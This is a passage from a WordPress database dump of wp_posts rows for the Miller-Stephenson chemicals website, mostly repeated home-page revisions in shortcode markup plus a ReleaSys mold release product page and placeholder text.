the woods, yet are tame enough to nibble apple slices from children visitors. Miller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="247"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-18 15:40:52', '2016-08-18 15:40:52', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (455, 1, '2016-08-18 15:44:44', '2016-08-18 15:44:44', '[row]\r\n\r\n[col span="6"]\r\n\r\n[ux_banner height="600px" bg="523" link="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent/"]\r\n\r\n[text_box width="45" width__sm="60" scale="123" animate="fadeIn" position_x="100" position_y="20" text_align="left"]\r\n\r\n[title style="center" text="Semi-Permanent Mold Release" size="88"]\r\n<h1><strong>ReleaSys</strong></h1>\r\n<strong><em>Miller-Stephenson Exclusive Product</em></strong><a class="button alt-button white" title="" href="../chemicals/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="6"]\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys Release Agent is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release agent system on the market, capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[button text="Download ReleaSys Product Guide" style="primary" link="https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-Product-Guide-1.pdf"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'publish', 'closed', 'closed', '', 'releasys-release-agent', '', '', '2017-01-17 17:48:56', '2017-01-17 17:48:56', '', 0, 'https://132.148.10.86/wordpress/?page_id=455', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (456, 1, '2016-08-18 15:44:44', '2016-08-18 15:44:44', ' ', '', '', 'publish', 'closed', 'closed', '', '456', '', '', '2016-08-18 15:44:44', '2016-08-18 15:44:44', '', 0, 'https://132.148.10.86/wordpress/456/', 2, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (457, 1, '2016-08-18 15:44:44', '2016-08-18 15:44:44', '', 'Introducing RealSys - Our Newest Release Agent', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 15:44:44', '2016-08-18 15:44:44', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (458, 1, '2016-08-18 15:46:39', '2016-08-18 15:46:39', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-real…st-release-agent/"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 15:46:39', '2016-08-18 15:46:39', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (459, 1, '2016-08-18 15:47:07', '2016-08-18 15:47:07', '<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re', 'Introducing RealSys - Our Newest Release Agent', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 15:47:07', '2016-08-18 15:47:07', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (460, 1, '2016-08-18 15:48:09', '2016-08-18 15:48:09', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 15:48:09', '2016-08-18 15:48:09', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (461, 1, '2016-08-18 15:48:29', '2016-08-18 15:48:29', '<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re', 'Introducing ReleaSys - Our Newest Release Agent', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 15:48:29', '2016-08-18 15:48:29', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (462, 1, '2016-08-18 15:49:52', '2016-08-18 15:49:52', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 15:49:52', '2016-08-18 15:49:52', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (463, 1, '2016-08-18 15:50:17', '2016-08-18 15:50:17', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="secondary"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 15:50:17', '2016-08-18 15:50:17', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (464, 1, '2016-08-18 15:50:42', '2016-08-18 15:50:42', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="primary alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 15:50:42', '2016-08-18 15:50:42', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (465, 1, '2016-08-18 15:51:54', '2016-08-18 15:51:54', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[button text="TECH SUPPORT" link="https://" 